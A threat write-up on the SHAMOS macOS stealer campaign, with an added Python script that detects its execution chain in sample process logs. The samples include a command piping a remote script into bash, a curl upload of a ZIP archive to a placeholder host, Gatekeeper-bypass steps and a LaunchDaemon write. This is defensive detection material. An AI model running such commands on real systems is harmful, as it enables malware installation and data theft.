Description

Between June and August 2025, a large macOS-targeted malware campaign infected more than 300 customer environments worldwide. The COOKIE SPIDER cybercrime group carried out the attack using a new variant of the Atomic macOS Stealer (AMOS) known as SHAMOS. Using misleading help websites such as mac-safer.com and rescue-mac.com, the campaign preyed on users searching for genuine troubleshooting tips such as "macOS flush resolver cache." Through malvertising and identity spoofing (for example, posing as an Australian electronics retailer), the attackers tricked victims into running a malicious one-line terminal command, which unknowingly started the malware download.

SHAMOS is an advanced stealer delivered by a Bash script downloaded from a spoofed iCloud-themed domain. Once executed, the malware captures the user's password, drops a Mach-O binary in `/tmp/`, and bypasses macOS Gatekeeper by using `xattr` and `chmod` on the dropped file. It performs system checks to avoid running in sandbox environments, uses AppleScript for host reconnaissance, and collects sensitive data including cryptocurrency wallets, browser credentials, Keychain data, and Apple Notes. The stolen data is packed into a ZIP archive and exfiltrated with `curl`; if administrator rights are obtained, persistence is established through a LaunchDaemon plist file.

To defend against attacks of this kind, users and organizations must not run unverified terminal commands taken from third-party sites, even when they appear legitimate. Trusted endpoint protection, disabling advertising-based tracking, and DNS filtering can greatly reduce exposure. IT staff should also train employees to recognize social engineering, enforce least privilege, and monitor for suspicious outbound network traffic to catch early signs of compromise.
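As an added example (not part of the original description), the following Python script applies detection heuristics for the SHAMOS execution chain described above to constructed process-telemetry lines: a remote script piped into a shell, quarantine-attribute stripping and `chmod` on a `/tmp/` file, a `curl` upload of a ZIP archive, and a LaunchDaemon plist write. The `pid= user= cmd=` log format, the file names and the `.invalid` domains are assumptions, not indicators from the campaign.

```python
import re
from dataclasses import dataclass

# Constructed sample process-execution telemetry (one command line per entry).
# Domains and paths are placeholders, not real indicators from the campaign.
SAMPLE_EVENTS = [
    "pid=4101 user=alice cmd=ls -la /Users/alice/Documents",
    "pid=4102 user=alice cmd=sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder",
    "pid=4103 user=alice cmd=curl -fsSL https://icloud-example.invalid/s.sh | bash",
    "pid=4104 user=alice cmd=xattr -c /tmp/update",
    "pid=4105 user=alice cmd=chmod +x /tmp/update",
    "pid=4106 user=alice cmd=curl -F file=@/tmp/out.zip https://icloud-example.invalid/up",
    "pid=4107 user=root cmd=cp /tmp/com.update.plist /Library/LaunchDaemons/com.update.plist",
    "pid=4108 user=alice cmd=curl -sS https://example.com/index.html -o /tmp/page.html",
]

# One rule per stage of the chain: (rule name, regex matched against the command line).
RULES = [
    ("remote_script_piped_to_shell", re.compile(r"\bcurl\b[^|]*\|\s*(bash|sh|zsh)\b")),
    ("quarantine_strip_in_tmp", re.compile(r"\bxattr\s+(-c|-d\s+com\.apple\.quarantine)\s+/tmp/")),
    ("chmod_exec_in_tmp", re.compile(r"\bchmod\s+([ugoa]*\+\S*x\S*|[0-7]*[1357][0-7]*)\s+/tmp/")),
    ("archive_upload_via_curl", re.compile(r"\bcurl\b.*(-F|--data-binary|-T|--upload-file)\s+\S*\.zip\b")),
    ("launchdaemon_plist_write", re.compile(r"/Library/LaunchDaemons/\S+\.plist\b")),
]

@dataclass(frozen=True)
class Finding:
    pid: int
    user: str
    rule: str
    cmd: str

def parse_event(line):
    """Split a 'pid=... user=... cmd=...' line; returns None for malformed input."""
    m = re.match(r"pid=(\d+)\s+user=(\S+)\s+cmd=(.*)$", line)
    return (int(m.group(1)), m.group(2), m.group(3)) if m else None

def scan_events(lines):
    """Return one Finding per (event, rule) match; clean events produce nothing."""
    findings = []
    for line in lines:
        parsed = parse_event(line)
        if parsed is None:
            continue
        pid, user, cmd = parsed
        findings.extend(Finding(pid, user, name, cmd) for name, rx in RULES if rx.search(cmd))
    return findings

def chain_score(findings):
    """Count distinct chain stages observed; several stages on one host is a strong signal."""
    return len({f.rule for f in findings})
```

Any single rule can fire on benign admin activity; the legitimate cache-flush command in the sample deliberately matches nothing, and the value of the script is in `chain_score`, which correlates multiple stages rather than alerting on one.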